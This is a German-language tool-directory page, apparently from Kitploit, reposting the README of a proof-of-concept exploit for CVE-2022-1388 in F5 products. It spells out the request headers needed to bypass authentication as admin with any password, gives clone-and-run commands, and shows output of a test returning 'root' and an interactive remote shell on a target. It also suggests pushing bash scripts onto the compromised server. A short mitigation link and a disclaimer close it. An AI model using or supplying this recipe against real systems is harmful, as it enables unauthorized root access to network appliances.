Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-1388-POC — Ein verbessertes Proof-of-Concept für CVE-2022-1388 mit einer interaktiven Shell | Kitploit
Tools/GitHubGitHub/psychosec2/cve-2022-1388-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingRemote-Access-Tool
GitHubpsychosec2/cve-2022-1388-poc

CVE-2022-1388-POC

Ein verbessertes Proof-of-Concept für CVE-2022-1388 mit einer interaktiven Shell

Repository anzeigen
144vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-1388 PoC von PsychoSec

Verbesserter PoC für CVE-2022-1388, der mehrere F5-Produkte betrifft.

Dies ist eine verbesserte Version des Proof of Concept von Horizon3 für CVE-2022-1388: https://github.com/horizon3ai/CVE-2022-1388

Diese Version enthält mehrere Verbesserungen sowie eine interaktive Shell zum Ausführen von Remote-Befehlen.

Technische Analyse:

Die technische Ursachenanalyse der Schwachstelle von Horizon3 finden Sie in ihrem Blog: https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/

Zusammenfassung:

Notwendige Bedingungen einer Anfrage zur Ausnutzung dieser Schwachstelle:

  1. Der Connection-Header muss X-F5-Auth-Token enthalten
  2. Der X-F5-Auth-Token-Header muss vorhanden sein
  3. Der Host-Header muss localhost / 127.0.0.1 sein oder der Connection-Header muss X-Forwarded-Host enthalten
  4. Der Auth-Header muss mit dem Admin-Benutzernamen und einem beliebigen Passwort gesetzt werden

Anforderungen:

  • git
  • pip3
  • python3

Installation:

root@kitploit:~
git clone https://github.com/PsychoSec2/CVE-2022-1388-POC.git
cd ./CVE-2022-1388-POC
pip3 install -r requirements.txt
python3 ./CVE-2022-1388.py -h

Verwendung:

Testen eines Ziels:

root@kitploit:~
root@kali:/home/dev/CVE-2022-1388-POC# python3 CVE-2022-1388.py -u https://192.168.0.221 -t
Running test on target: https://192.168.0.221 | Command: whoami
Response: root
Target is vulnerable!!

Use -s option to run an interactive shell.

Interaktive Shell:

root@kitploit:~
root@kali:/home/dev/CVE-2022-1388-POC# python3 CVE-2022-1388.py -u https://192.168.0.221 -s
Running interactive shell..

root@f5-localhost: /var/service/restjavad$ 

Erfordert keine Reverse-TCP-Verbindungen oder Listener.

Optionen:

root@kitploit:~
root@kali:/home/dev/CVE-2022-1388-POC# python3 CVE-2022-1388.py -h
Usage: CVE-2022-1388.py [options]

Options:
  -h, --help         Show this help message.
  -u URL, --url=URL  The IP address of the target.
  -t, --test         Test target for CVE-2022-1388.
  -s, --shell        Run an interactive shell.

Wichtig:

Bitte beachten Sie, dass beim Ausführen der interaktiven Shell auf einem nicht gepatchten System bestimmte Befehle und Syntaxen möglicherweise nicht funktionieren oder nicht das erwartete Ergebnis liefern. Dies liegt wahrscheinlich an der Verwendung von JSON in Server-API-Anfragen und -Antworten. Um Probleme zu vermeiden, versuchen Sie, bei der Verwendung der interaktiven Shell keine einzelnen Zeichen zu verwenden, die in der JSON-Syntax üblich sind, wie Doppelpunkte, Kommas, geschweifte Klammern, eckige Klammern und insbesondere Anführungszeichen. Jede JSON-Syntax innerhalb eines Befehls sollte strukturiert im Format angegeben werden.

Die Verwendung einer unstrukturierten JSON-Syntax in einem Befehl kann zu einer fehlerhaften API-Anfrage an den Server führen und dazu, dass Sie keine Befehlsausgabe erhalten, nichts ausgeführt wird oder Sie vollständig aus dem Python-Skript geworfen werden. Dies macht leider einige Befehle unbrauchbar. Um dieses Problem zu umgehen, können Sie stattdessen ein Bash-Skript schreiben, es auf den Server herunterladen und es mit der interaktiven Shell ausführen. Es ist auch nicht möglich, mit dem Befehl 'cd' die Verzeichnisse zu wechseln.

  • Einführung in JSON: https://javaee.github.io/tutorial/jsonp001.html

In jedem Fall sollten Sie dennoch in der Lage sein, grundlegende Befehlsausgaben zu erhalten. Wenn Sie keine Befehlsausgabe erhalten, bedeutet das nicht, dass der Befehl nicht ausgeführt wurde. Das müssen Sie jedoch durch eigene Analyse herausfinden.

Gegenmaßnahmen:

Aktualisieren Sie auf die neueste Version oder ergreifen Sie Gegenmaßnahmen, indem Sie den Anweisungen im F5 Security Advisory folgen.

  • https://support.f5.com/csp/article/K23605346

Haftungsausschluss:

Diese Software wurde ausschließlich für Zwecke der akademischen Forschung und für die Entwicklung effektiver Verteidigungstechniken erstellt und ist nicht dazu bestimmt, Systeme anzugreifen, außer wenn dies ausdrücklich genehmigt wurde. Die Projektbetreuer sind nicht verantwortlich oder haftbar für Missbrauch der Software. Verwenden Sie sie verantwortungsvoll.

Tool herunterladen